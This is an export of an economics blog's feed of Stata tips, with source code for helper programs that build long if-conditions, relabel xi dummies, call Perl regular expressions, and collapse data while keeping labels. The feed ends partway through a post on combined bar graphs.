tag:blogger.com,1999:blog-27226716673904632662024-03-05T01:39:28.914-08:00Oh missionObservations on economic development and other random stuff.Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.comBlogger39125tag:blogger.com,1999:blog-2722671667390463266.post-48900783405736311442014-01-26T12:27:00.000-08:002014-01-26T12:27:21.622-08:00My ado files are all available on GitHub. The link is here: https://github.com/shafiquejamal/stata_ado_files<div dir="ltr" style="text-align: left;" trbidi="on">
My ado files are all available on GitHub. The link is here:<br />
<br />
<a href="https://github.com/shafiquejamal/stata_ado_files">https://github.com/shafiquejamal/stata_ado_files</a><br />
<br />
To get these files, visit the above link and click download zip (on the right).<br />
<br />
To get individual files, click on any of the files, and then click "Raw". You can then copy the text and paste it into your do-file editor (e.g. https://raw.github.com/shafiquejamal/stata_ado_files/master/collapseandpreserve.ado)</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-36372024028829099372012-12-08T03:50:00.002-08:002012-12-08T03:55:42.108-08:00Stata tip: "Mega If" : a simple command to generate long if conditions<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you need to type the following command that has many conditions in the <span style="font-family: "Courier New",Courier,monospace;">if</span> condition:<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">replace group = 1 if (benefitNumber == 1 | benefitNumber == 2 | benefitNumber == 3 | benefitNumber == 4 | benefitNumber == 5 | benefitNumber == 6 | benefitNumber == 11 | benefitNumber == 12 | benefitNumber == 17 | benefitNumber == 19 | benefitNumber == 21 | benefitNumber == 22 | benefitNumber == 23) </span><br />
<br />
It's a bit much to type. The program <span style="font-family: "Courier New",Courier,monospace;">megaif</span> below will generate this long line from the much shorter command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">megaif 1 2 3 4 5 6 11 12 17 19 21 22 23, v(benefitNumber) c(replace group = 1)</span><br />
<br />
The above has lots of "or equals", but you can also generate lots of "and does not equal", for example:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">replace group = 1 if (benefitNumber != 1 & benefitNumber != 2 & benefitNumber != 3 & benefitNumber != 4 & benefitNumber != 5 & benefitNumber != 6 & benefitNumber != 11 & benefitNumber != 12 & benefitNumber != 17 & benefitNumber != 19 & benefitNumber != 21 & benefitNumber != 22 & benefitNumber != 23) </span><br />
<br />
using the following command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">megaif 1 2 3 4 5 6 11 12 17 19 21 22 23, v(benefitNumber) c(replace group = 1) e(!=) s(&)</span><br />
<br />
It works for numeric variables and for string variables too. Check this out:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">megaif "a b" b "cc" d `"e"', v(benefit_stringvar) c(replace group = 1) e(!=) s(&)</span><br />
<br />
executes the following command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">cmd to execute: replace group = 1 if (benefit_stringvar != "a b" & benefit_stringvar != "b" & benefit_stringvar != "cc" & benefit_stringvar != "d" & benefit_stringvar != "e") </span><br /><br />
As you can see, for string variables the quotes are optional unless you're checking for text that has a space in it. The program is below. Enjoy!<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define megaif<br /><br /> // By Shafique Jamal<br /> // e.g. <br /> // sysuse auto, clear<br /> // megaif 0 1, v(foreign) c(drop) e(~=) // this will drop all the observations. Just for illustrative purposes to show how the command could be used<br /> // another e.g.<br /> // The command:<br /> // megaif 14 15 16 17 18 19 20 21 22, c(gen priv1 = 1) var(income_type2)<br /> // would execute the following command:<br /> // gen priv1 = 1 if (income_type2 == "14" | income_type2 == "15" | income_type2 == "16" | income_type2 == "17" | income_type2 == "18" | income_type2 == "19" | income_type2 == "20" | income_type2 == "21" | income_type2 == "22") <br /><br /><br /> syntax anything(id="variable and values" name=arguments), Var(varname) Cmd(string) [Equality(string) Separator(string)]<br /> <br /> // The default is equality<br /> if ("`equality'" == "") {<br /> local equality "=="<br /> }<br /> <br /> if ("`separator'" == "") {<br /> local separator " | "<br /> }<br /> else {<br /> local separator " `separator' "<br /> }<br /> <br /> cap confirm numeric variable `var'<br /> if (_rc == 0) { // variable is numeric<br /> local numericvar = 1<br /> } <br /> else {<br /> local numericvar = 0<br /> }<br /> // di "numericvar = `numericvar'"<br /> <br /> local count = 0<br /> local orcondition ""<br /> foreach w of local arguments {<br /> local count = `count' + 1<br /><br /> // di `"w = `w'"'<br /> if (`numericvar' == 0) {<br /> local orcondition `"`orcondition'`orseparator'`var' `equality' "`w'""'<br /> }<br /> else {<br /> local orcondition `"`orcondition'`orseparator'`var' `equality' `w'"'<br /> }<br /> local orseparator "`separator'"<br /> }<br /> <br /> // di `"orcondition = `orcondition'"'<br /> di `"cmd to execute: `cmd' if (`orcondition') "'<br /> // set trace on<br /> // set traced 1<br /> `cmd' if (`orcondition')<br /> set trace off<br /><br />end</span><br />
<br />
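As a quick check, here is a minimal sketch of how <span style="font-family: "Courier New",Courier,monospace;">megaif</span> could be tried on the auto dataset that ships with Stata. It assumes the program above has already been defined in the current session; the variable name <span style="font-family: "Courier New",Courier,monospace;">toprep</span> is made up for this illustration.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sysuse auto, clear<br />* hypothetical indicator variable, used only for this illustration<br />gen byte toprep = 0<br />* numeric variable: default equality (==) and default separator (|)<br />megaif 4 5, v(rep78) c(replace toprep = 1)<br />* string variable: values containing a space need double quotes<br />megaif "AMC Concord" "Buick Regal", v(make) c(list make price)</span><br />
<br />
Going by the program's code, the first call should run <span style="font-family: "Courier New",Courier,monospace;">replace toprep = 1 if (rep78 == 4 | rep78 == 5)</span>, and the second should list only the two named cars. The generated command is also echoed after "cmd to execute:", so it can be checked before relying on the result.<br />
<br />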
<br />
<br /></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-56532217262341402492012-12-06T01:46:00.004-08:002012-12-07T11:23:36.895-08:00Stata tip: Quickly, and in one command, rename all variable labels of variables generated with the 'xi' command to reflect the value labels of the xi'd variable<div dir="ltr" style="text-align: left;" trbidi="on">
When you use the xi command on categorical variables, even on those that have a value label associated with them, you get this:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. xi: svy, subpop(rural): reg logpccd rural_regressors refrigerator car livingroomsper numchild11 numchild11_sq i.oblast i.typeofdwell i.roof i.coldwatermeterinstalled i.soc_</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. d</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">_Ioblast_3 byte %8.0g oblast==3<br />_Ioblast_4 byte %8.0g oblast==4<br />_Ioblast_5 byte %8.0g oblast==5<br />_Ioblast_6 byte %8.0g oblast==6<br />_Ioblast_7 byte %8.0g oblast==7<br />_Ioblast_8 byte %8.0g oblast==8<br />_Ioblast_11 byte %8.0g oblast==11<br />_Itypeofdwe_2 byte %8.0g typeofdwelling==2<br />_Itypeofdwe_3 byte %8.0g typeofdwelling==3<br />_Itypeofdwe_4 byte %8.0g typeofdwelling==4<br />_Itypeofdwe_5 byte %8.0g typeofdwelling==5<br />_Itypeofdwe_6 byte %8.0g typeofdwelling==6<br />_Itypeofdwe_7 byte %8.0g typeofdwelling==7<br />_Itypeofdwe_8 byte %8.0g typeofdwelling==8<br />_Itypeofdwe_9 byte %8.0g typeofdwelling==9</span><br />
<br />
These variable labels are not much more informative than the variable names. Below is a program that automatically rewrites the variable labels of the variables created by the xi command so that they include the corresponding value label, as follows:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">_Ioblast_3 byte %8.0g oblast=Jalalabat<br />_Ioblast_4 byte %8.0g oblast=Naryn<br />_Ioblast_5 byte %8.0g oblast=Batken<br />_Ioblast_6 byte %8.0g oblast=Osh<br />_Ioblast_7 byte %8.0g oblast=City of Osh<br />_Ioblast_8 byte %8.0g oblast=Chui<br />_Ioblast_11 byte %8.0g oblast=City of Bishkek<br />_Itypeofdwe_2 byte %8.0g typeofdwelling=Apartment or room in a residential hotel<br />_Itypeofdwe_3 byte %8.0g typeofdwelling=Separate house<br />_Itypeofdwe_4 byte %8.0g typeofdwelling=Part of a house<br />_Itypeofdwe_5 byte %8.0g typeofdwelling=Dormitory<br />_Itypeofdwe_6 byte %8.0g typeofdwelling=Lodge or a tied cottage (temporary tenure dwelling)<br />_Itypeofdwe_7 byte %8.0g typeofdwelling=Other non-residential premises used for residence<br />_Itypeofdwe_8 byte %8.0g typeofdwelling=Other residential premises<br />_Itypeofdwe_9 byte %8.0g typeofdwelling=Barracks<br /> </span><br />
There are actually two programs - mine is a wrapper for a program that Nicholas J. Cox wrote. Both of these are below.<br />
<br />
Usage (run this after the <span style="font-family: "Courier New",Courier,monospace;">xi</span> command):<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. varsformyrelabel </span><br />
<br />
Programs:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define varsformyrelabel <br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com), 12-07-2012<br /> // UPDATE 12-07-2012: Need to change how the variable name for the list of `allunxidvariables' is determined. Need to get it from the variable label, rather than the variable name<br /> //<br /><br /> // Get list of variables that were xi'd<br /> local xivars "`_dta[__xi__Vars__To__Drop__]:'"<br /> // di `"xivars:`xivars'"'<br /> <br /> // Now just need to get list of un-xi'd variables from this list<br /> // Here is the first one<br /> local currentdummyvar : word 1 of `xivars'<br /> // di `"currentdummyvar:`currentdummyvar'"'<br /> <br /> // This will get the full variable name<br /> local currentunxidvar = regexr("`: variable label `currentdummyvar''","==.*$","")<br /> // di `"currentunxidvar:`currentunxidvar'"'<br /> local allunxidvars "`currentunxidvar'"<br /> // di `"allunxidvars:`allunxidvars'"'<br /> <br /> // This will get the _I`var' name, without the _# suffix - I need this for the first argument to the myrelabel routine. Variable name gets shortened<br /> local currentunxidvarwith_I = regexr("`currentdummyvar'","_[0-9]+$","")<br /> // di `"currentunxidvar:`currentunxidvarwith_I'"'<br /> local allunxidvarswith_I "`currentunxidvarwith_I'"<br /> // di `"allunxidvarswith_I:`allunxidvarswith_I'"'<br /> <br /> // Now loop through the rest<br /> local count = 0<br /> foreach var of local xivars { <br /> local count = `count' + 1<br /> if (`count' != 1) {<br /> local w : word `count' of `xivars'<br /> // di "w: `w'"<br /> <br /> // check whether the next xi'd var is related to the current one<br /> // if (regexm("`w'","^_I`currentunxidvar'_[0-9]+$")) { // yes, this is part of the same family as the current _I.... variable under consideration<br /> if (regexm("`: variable label `w''","^`currentunxidvar'==.*$")) { // yes, this is part of the same family as the current _I.... 
variable under consideration<br /> // di "skip"<br /> }<br /> else { // no, it is different. add to the list<br /> // this gets the full variable name<br /> local currentunxidvar = regexr("`: variable label `w''","==.*$","")<br /> // di `"currentunxidvar:`currentunxidvar'"'<br /> local allunxidvars "`allunxidvars' `currentunxidvar'"<br /> // di `"allunxidvars:`allunxidvars'"'<br /> <br /> // This gets the _Ivar name<br /> local currentunxidvarwith_I = regexr("`w'","_[0-9]+$","")<br /> // di `"currentunxidvar:`currentunxidvarwith_I'"'<br /> local allunxidvarswith_I "`allunxidvarswith_I' `currentunxidvarwith_I'"<br /> // di `"allunxidvarswith_I:`allunxidvarswith_I'"'<br /> } <br /> }<br /> }<br /><br /> di "allunixidvars: `allunxidvars'"<br /> di `"allunxidvarswith_I:`allunxidvarswith_I'"'<br /> local count = 0 <br /> foreach var of local allunxidvars {<br /> local count = `count' + 1<br /> local varwith_I : word `count' of `allunxidvarswith_I'<br /> myrelabel `varwith_I'_* `var'<br /> }<br /> <br />end</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program def myrelabel<br />*! NJC 1.0.0 15 July 2003<br /> version 7<br /> syntax varlist(numeric)<br /><br /> tokenize `varlist'<br /> local nvars : word count `varlist'<br /> local last ``nvars''<br /> local vallabel : value label `last'<br /> if "`vallabel'" == "" {<br /> di as err "`last' not labelled"<br /> exit 498<br /> }<br /><br /> local `nvars'<br /> local varlist "`*'"<br /><br /> foreach v of local varlist {<br /> local varlabel : variable label `v'<br /> local eqs = index(`"`varlabel'"', "==")<br /> if `eqs' {<br /> local value = real(substr(`"`varlabel'"', `eqs' + 2, .))<br /> if `value' < . {<br /> local label : label `vallabel' `value'<br /> label var `v' `"`last'=`label'"'<br /> }<br /> }<br /> }<br /><br />end</span><br />
<br />
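To try the two programs above without survey data, a minimal sketch using the auto dataset that ships with Stata might look like the following. It assumes both <span style="font-family: "Courier New",Courier,monospace;">varsformyrelabel</span> and <span style="font-family: "Courier New",Courier,monospace;">myrelabel</span> have already been defined, and it uses <span style="font-family: "Courier New",Courier,monospace;">foreign</span> because that variable has a value label attached (an unlabelled variable would make <span style="font-family: "Courier New",Courier,monospace;">myrelabel</span> exit with an error).<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sysuse auto, clear<br />* xi creates the dummy _Iforeign_1 for the labelled variable foreign<br />xi: regress price mpg i.foreign<br />* variable label before relabelling<br />describe _I*<br />* rewrite the variable labels of all xi-generated dummies<br />varsformyrelabel<br />* variable label after relabelling<br />describe _I*</span><br />
<br />
If everything works as described in this post, the label of <span style="font-family: "Courier New",Courier,monospace;">_Iforeign_1</span> should change from the form <span style="font-family: "Courier New",Courier,monospace;">foreign==1</span> to the form <span style="font-family: "Courier New",Courier,monospace;">foreign=Foreign</span>.<br />
<br />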
</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com1tag:blogger.com,1999:blog-2722671667390463266.post-86310308946691304282012-12-03T00:32:00.003-08:002012-12-07T19:30:42.499-08:00Stata tip: Using perl compatible regular expressions (PCRE) in Stata<div dir="ltr" style="text-align: left;" trbidi="on">
UPDATE 12-07-2012: Thanks to Nicholas J Cox, who solved the problem I was having with the <span style="font-family: "Courier New",Courier,monospace;">-marksample-</span> command. I replaced the code below with the new, fixed code. <br />
<br />
Stata's regular expression engine is too limited for my needs. I asked the statalist about how to change Stata's regular expression engine, <a href="http://www.stata.com/statalist/archive/2012-11/msg00661.html" target="_blank">but apparently it is not possible</a>. So I wrote a Stata program (.ado file) to call a perl script to run a regular expression on a variable.<br />
<br />
Matching and substitution are supported. Named captures/groups are not, but non-named captures (e.g. $1, $2, etc.) ARE supported. I think quantifiers are supported. Anyways, if it works as I think it should based on my design and testing, it should be a decent improvement over Stata's built-in regular expression engine (I hope they update it soon).<br />
<br />
You can download the perl script <a href="https://docs.google.com/open?id=0BwOJxAq1e-5UbFQ0NjVVOFN4azg" target="_blank">here</a>. Download it and place it in any directory - just remember the directory because you will have to specify it when you call the program.<br />
<br />
The Stata program is <a href="https://docs.google.com/open?id=0BwOJxAq1e-5UeGxJYzN6SUh0NXM" target="_blank">here</a> and below. Put this in your personal ado folder.<br />
<br />
Usage:<br />
<br />
Match only:<br />
<span style="font-family: "Courier New",Courier,monospace;">pcre SOME_STRING_VARIABLE, re("/^(\d)(\w)/i") gen(NEW_VARIABLE_TO_BE_GENERATED) pa("/usr/local/ActivePerl-5.16/bin/")</span><br />
<br />
Substitution:<br />
<span style="font-family: "Courier New",Courier,monospace;">pcre SOME_STRING_VARIABLE, re("/^(\d)(\w)/gi") gen(NEW_VARIABLE_TO_BE_GENERATED) pa("/usr/local/ActivePerl-5.16/bin/") repl("firstone_$1_secondone_$2") </span><br />
<br />
Notes:<br />
<br />
1. The argument for re() should be a regular expression enclosed in double quotes. You can use only the forward slash for a delimiter. Named captures/groups don't work yet (I can't figure out why. Any ideas?)<br />
<br />
2. The argument for repl() should be the replacement part of s//THIS_PART/. It should be enclosed in double quotes. Do NOT include the forward slashes or any delimiters. Option modifiers do NOT go here. You can use backreferences $1, $2, etc. but NOT named groups/named captures (i.e. you can't use \g{1}, \g{name}, etc. The \g{} notation doesn't work at all).<br />
<br />
3. You can specify the path to your perl installation in pa() (Be sure to include the trailing forward slash). If you don't, it will use whatever version of perl is accessible from the command line in a terminal in whatever path this is run from.<br />
<br />
4. You should specify the directory of the perl script that this program calls (stataregex.pl) in the perlprogramdirwithfinalslash() option. You can download the script from my blog: shafiquejamal.blogspot.com. The default is the /Applications/STATA12/ directory. Be sure to include the trailing forward slash.<br />
<br />
5. This will generate a binary/dummy variable indicating whether the match was a success, and variables prefixed by this same variable name with _1, _2, _3 ... , _16 appended to store the numbered captures/groups. <br />
<br />
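For comparison, here is a minimal sketch of how the pattern from the usage examples might be written with Stata's built-in <span style="font-family: "Courier New",Courier,monospace;">regexm()</span> and <span style="font-family: "Courier New",Courier,monospace;">regexs()</span> functions. It rests on the assumption that the built-in engine of that era does not recognize Perl shorthand classes such as \d and \w, so they are spelled out as bracket expressions; the toy data and the variable names <span style="font-family: "Courier New",Courier,monospace;">code</span>, <span style="font-family: "Courier New",Courier,monospace;">matched</span>, <span style="font-family: "Courier New",Courier,monospace;">cap1</span> and <span style="font-family: "Courier New",Courier,monospace;">cap2</span> are made up for this illustration.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">clear<br />input str10 code<br />"7abc"<br />"x123"<br />"9_zz"<br />end<br />* [0-9] stands in for \d and [A-Za-z0-9_] stands in for \w<br />gen byte matched = regexm(code, "^([0-9])([A-Za-z0-9_])")<br />* regexs(n) returns the n-th capture of the regexm() call in the if condition<br />gen str1 cap1 = regexs(1) if regexm(code, "^([0-9])([A-Za-z0-9_])")<br />gen str1 cap2 = regexs(2) if regexm(code, "^([0-9])([A-Za-z0-9_])")<br />list</span><br />
<br />
This covers simple cases, but anything that depends on Perl-only syntax is where a wrapper like the program below becomes useful.<br />
<br />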
<span style="font-family: "Courier New", Courier, monospace;">program define pcre<br /><br /> // 30101990<br /> // Written by Shafique Jamal (shafique.jamal@gmail.com), 01 Dec 2012. Use at own risk :-p<br /> //<br /> // This program allows the user to use perl compatible regular expressions on a (single) string VARIABLE (not a scalar string) for matching, obtaining captures from memory parenthesis, and<br /> // subsitutions. Its not perfect... I think it supports quantifiers, it does support options/option modifiers, but it does not support named captures/groups. <br /> //<br /> // Usage:<br /> //<br /> // Match only:<br /> // pcre SOME_STRING_VARIABLE, re("/^(\d)(\w)/i") gen(NEW_VARIABLE_TO_BE_GENERATED) pa("/usr/local/ActivePerl-5.16/bin/")<br /> // Substitution:<br /> // pcre SOME_STRING_VARIABLE, re("/^(\d)(\w)/gi") gen(NEW_VARIABLE_TO_BE_GENERATED) pa("/usr/local/ActivePerl-5.16/bin/") repl("firstone_$1_secondone_$2")<br /> //<br /> // Note:<br /> //<br /> // 1. The arguement for re() should be a regular expression enclosed in double quotes. You can use only the forward slash for a delimiter. Named captures/groups don't work yet (I can't <br /> // figure out why. Any ideas?)<br /> // 2. The arguement for repl() should be the replacement part of s//THIS_PART/. It should be enclosed in double quotes. Do NOT include the forward slashes or any delimiters. <br /> // Option modifiers do NOT go here. You can use backreferences $1, $2, etc. but NOT named groups/named captures (i.e. you can't use \g{1}, \g{name}, etc. The \g{} notation doesn't work at all). <br /> // 3. You can specify the path to your perl installation in pa() (Be sure to include the trailing forward slash). If you don't, it will use whatever version of perl is accessible from the command line in a terminal in whatever path this<br /> // is run from.<br /> // 4. You should specify the path of the perl script that this program calls: stataregex.pl. 
You can download this from my blog: shafiquejamal.blogspot.com <br /> // The default is the /Applications/STATA12/ directory. Be sure to include the trailing forward slash. <br /> // 5. This will generate a binary/dummy variable the match was a success, and variables prefixed by this same variable name with _1, _2, _3 ... , _16 appended to store the named captures/groups. <br /> // It will also store (NEW_VAR_NAME)_s to store the new string with the substitution<br /> //<br /> // Steps:<br /> // 1. generate a merge variable based on _n. This is to make sure that the newly generated variable matches up by observations with the argument variable<br /> // 2. outsheet the merge variable and the argument variable into a csv file<br /> // 3. read the file into memory using perl<br /> // 4. perform the reg exp mach querry on each observation. Store result (0 or 1) in an array, whose index is the observation number as given in the merge variable<br /> // 5. save a new datafile, with the orignal merge var, and the match results variable, with the variable names in the headings<br /> // 6. merge this <br /> //<br /> // 02-12-2012: go ahead and pass the full regular expression with delimiters and options in the option REgularexpression(string asis)<br /> // Next step: detect whether a variable or string is the first arguement<br /> //<br /> //<br /> //<br /> // 1. generate a merge variable based on _n. This is to make sure that the newly generated variable matches up by observations with the argument variable<br /> <br /> syntax varname(string) [if], GENerate(name) REgularexpression(string asis) [Perlprogramdirwithfinalslash(string asis) PAthroperlwithfinalslash(string asis) REPLacement(string asis)]<br /> version 9.1<br /> marksample touse, strok<br /> // di `"`0'"'<br /> <br /> // 2. 
outsheet the merge variable and the argument variable into a csv file<br /> tempvar mergevar<br /> tempname _m<br /> // tempname touse2<br /> tempfile tfoutsheet<br /> tempfile tfinsheet<br /> tempfile tfinsheed_dta<br /> gen `mergevar' = _n<br /> // for some reason, marksample is not working<br /> // gen `touse2' = 0<br /> // qui replace `touse2' = 1 `if'<br /> cap drop `generate'<br /> // this is the variable that will hold the string with subsitutions<br /> cap drop `generate'_*<br /> <br /> <br /> // count if `touse'<br /> // count if `touse2'<br /> // di `"`if'"'<br /> // list hhid `mergevar' `touse'<br /> <br /> // qui outsheet `mergevar' `varlist' `touse' using "tfoutsheet.csv", c replace<br /> qui outsheet `mergevar' `varlist' `touse' using "`tfoutsheet.csv'", c replace<br /> <br /> // check options passed<br /> if (`"`optionmodifiers'"'==`""') {<br /> local optionmodifiers `""'<br /> }<br /> <br /> // check for perl program directory<br /> if (`"`perlprogramdirwithfinalslash'"'==`""') {<br /> local perlprogramdirwithfinalslash "/Applications/STATA12/"<br /> }<br /> <br /> // 3. Perl operations. 
Need to supply arguments in this order: inputfilename outputfilename nameofnewvariablegenerated regularexpressionpattern regularexpressionoptions<br /> // shell `pathroperlwithfinalslash'perl -v<br /> // di `"shell `pathroperlwithfinalslash'perl "`perlprogramdirwithfinalslash'stataregex.pl" "`tfoutsheet.csv'" "`tfinsheet.csv'" "`generate'" `regularexpression'"'<br /> qui shell `pathroperlwithfinalslash'perl "`perlprogramdirwithfinalslash'stataregex.pl" "`tfoutsheet.csv'" "`tfinsheet.csv'" "`generate'" `regularexpression' '`replacement''<br /> <br /> preserve<br /> qui insheet using "`tfinsheet.csv'", c clear<br /> sort `mergevar'<br /> qui save `"`tfinsheed_dta'"', replace<br /> restore<br /> <br /> sort `mergevar'<br /> qui merge 1:1 `mergevar' using `"`tfinsheed_dta'"', gen(`_m')<br /> qui drop `_m'<br /> <br /> foreach var of varlist `generate'* {<br /> cap confirm numeric var `var'<br /> if (_rc == 0) {<br /> qui replace `var' = . if `touse' == 0<br /> }<br /> else {<br /> qui replace `var' = "" if `touse' == 0<br /> }<br /> } <br /><br />end program<br /></span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-10991923480329738362012-11-28T02:07:00.004-08:002012-12-02T21:53:06.773-08:00Stata tip: collapse dataset while preserving variable and value labels<div dir="ltr" style="text-align: left;" trbidi="on">
When I use the <span style="font-family: "Courier New",Courier,monospace;">collapse</span> command, I lose the variable and value labels associated with my variables. The following program does everything that the collapse command does, but preserves the variable and value labels. It also has an option to refrain from putting the <span style="font-family: "Courier New",Courier,monospace;">stat</span> in the variable label.<br />
<br />
Usage:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">collapseandpreserve hdff=zarpl time_id (last) obraz wouer=soc_st, by(hh_code resp) o</span><br />
<br />
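The usage line above relies on variables from a specific survey. A minimal sketch on the auto dataset that ships with Stata, assuming the program below has already been defined, might look like this; the new variable name <span style="font-family: "Courier New",Courier,monospace;">topweight</span> is made up for this illustration.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sysuse auto, clear<br />* mean of price and mpg, plus the maximum of weight stored as topweight<br />* the o option asks the program to leave the statistic out of the variable labels<br />collapseandpreserve (mean) price mpg (max) topweight=weight, by(foreign) o<br />* inspect the variable labels and value labels after collapsing<br />describe</span><br />
<br />
Going by the program's code, the collapsed variables should keep the variable labels of their source variables rather than labels of the form "(mean) price", and dropping the <span style="font-family: "Courier New",Courier,monospace;">o</span> option should put the statistic in front of each label.<br />
<br />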
Program: <br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">program define collapseandpreserve<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com).<br /> // This will collapse the dataset and preserve the variable and value labels. The syntax for using this is just like with the collapse command.<br /> // There is one additional optional option: show stat. If you add this option to the command (collapseandperserve ... ,by(...) omitstatfromvarlabel<br /> // then it will not show the statistic (i.e. (fist), (mean), (last), etc.) in the variable label<br /> <br /> syntax anything(id="variable and values" name=arguments equalok), by(string asis) [cw fast Omitstatfromvarlabel]<br /> version 9.1<br /> <br /> // save all the value labels<br /> tempfile tf<br /> label save using `"`tf'"', replace<br /> <br /> // get the list of variables to be collapse, and keep track of the value label - variable correspondence <br /> tempname precollapse_listofvars<br /> tempname postcollapse_listofvars<br /> tempname listofvaluelabels<br /> tempname valuelabelname<br /> tempname stat<br /> tempname oldvarname<br /> tempname newvarname<br /> local `stat' "(mean)"<br /> foreach a of local arguments {<br /> di `"word: `a'"'<br /> if (regexm(`"`a'"',"^\(.*\)$")) { // if there is something like (first), (mean), etc.<br /> local `stat' = `"`a'"' <br /> } <br /> else { // This is a variable. Store the associated variable label and value label name<br /> <br /> // What if there is an = in the term? 
then need two list of variables: a precollapse list and a postcollapse list<br /> if (regexm(`"`a'"',"^(.*)=(.*)$")) {<br /> // di "Regex match!"<br /> local `oldvarname' = regexs(2)<br /> // di "oldvarname: ``oldvarname''"<br /> local `newvarname' = regexs(1)<br /> // di "newvarname: ``newvarname''"<br /> }<br /> else {<br /> // di "NO regex match!"<br /> local `oldvarname' `"`a'"'<br /> // di "oldvarname: ``oldvarname''"<br /> local `newvarname' `"`a'"'<br /> // di "newvarname: ``newvarname''"<br /> }<br /> <br /> local `precollapse_listofvars' `"``precollapse_listofvars'' ``oldvarname''"'<br /> local `postcollapse_listofvars' `"``postcollapse_listofvars'' ``newvarname''"'<br /> local `valuelabelname' : value label ``oldvarname''<br /> tempname vl_``newvarname''<br /> local `vl_``newvarname''' : variable label ``oldvarname''<br /> if (`"``vl_``newvarname''''"' == `""') {<br /> local `vl_``newvarname''' `"``newvarname''"'<br /> }<br /> di `"omitstatfromvarlabel = `omitstatfromvarlabel'"'<br /> if (`"`omitstatfromvarlabel'"'==`""') {<br /> local `vl_``newvarname''' `"``stat'' ``vl_``newvarname''''"'<br /> di "not omitting"<br /> }<br /> else {<br /> local `vl_``newvarname''' `"``vl_``newvarname''''"'<br /> di "omitting"<br /> }<br /> <br /> if (`"``valuelabelname''"' == `""') { // variable has no value label<br /> local `listofvaluelabels' `"``listofvaluelabels'' ."'<br /> }<br /> else {<br /> local `listofvaluelabels' `"``listofvaluelabels'' ``valuelabelname''"'<br /> }<br /> }<br /> }<br /> <br /> collapse `arguments', by(`by') `cw' `fast'<br /> // macro list<br /> <br /> // retrieve the valuelabels<br /> qui do `"`tf'"'<br /> <br /> // reapply the variable labels and the value labels<br /> tempname count<br /> local `count' = 0<br /> di "------------------------------------------------"<br /> foreach var of local `postcollapse_listofvars' {<br /> di `"var: `var'"'<br /> di `"its variable label: ``vl_`var'''"'<br /> // reapply the variable labels<br /> local 
`count' = ``count'' + 1<br /> label var `var' `"``vl_`var'''"'<br /> <br /> // reapply the value labels<br /> local `valuelabelname' : word ``count'' of ``listofvaluelabels''<br /> if (`"``valuelabelname''"' != `"."') {<br /> label values `var' ``valuelabelname''<br /> }<br /> }<br />end program</span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-71018523144075375022012-11-27T20:23:00.001-08:002012-12-06T19:05:02.205-08:00Stata tip: Plotting similar graphs on the same graph<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you want to make a bar graph of a variable, such as consumption, for two mutually exclusive groups such as males and females, represented by one categorical variable ("male"). This is easy enough: use the <span style="font-family: "Courier New",Courier,monospace;">graph bar</span> command with an <span style="font-family: "Courier New",Courier,monospace;">over()</span> option. What if you want to plot over two categorical variables, one within the other: for example you want to plot average consumption for males and females that are self-employed, and average consumption for males and females that are not self-employed. Easy enough, just include an extra <span style="font-family: "Courier New",Courier,monospace;">over()</span> option with the extra categorical variable. In this example, each over group is mutually exclusive: you are either male or female, but can't be both, and you are either self-employed or not self-employed, but can't be both. In this example, the variables in your dataset are:<br />
<br />
consumption, male, self-employed<br />
<br />
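The nested case described above can be sketched with the nlsw88 dataset that ships with Stata. This is only a stand-in for the consumption example: <span style="font-family: "Courier New",Courier,monospace;">wage</span> plays the role of consumption, and <span style="font-family: "Courier New",Courier,monospace;">union</span> and <span style="font-family: "Courier New",Courier,monospace;">married</span> play the roles of the two mutually exclusive categorical variables.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sysuse nlsw88, clear<br />* one categorical variable: mean wage by union status<br />graph bar (mean) wage, over(union)<br />* two categorical variables, one within the other:<br />* union status within each marital status group<br />graph bar (mean) wage, over(union) over(married)</span><br />
<br />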
Suppose, however, that you want to essentially combine two separate graphs into one graph as follows: you want to plot average consumption over three categorical variables that are NOT mutually exclusive, so you don't want to plot one within the other. For example, imagine that you are considering three different policy options for awarding a social assistance benefit: the current policy ("currentpolicy"), alternative A ("alternative_a") and alternative B ("alternative_b"). Each mechanism divides the population into those who qualify and those who don't qualify for the social assistance benefit. Thus each policy option is represented in the data by a binary variable (a.k.a. a dummy variable, which is just a categorical variable with two levels: 0 for those who do not qualify and 1 for those who do qualify). Of the three policy options, the current policy is the least pro-poor, alternative A is more pro-poor (more of the benefits go to the poor), and alternative B is the most pro-poor. <br />
<br />
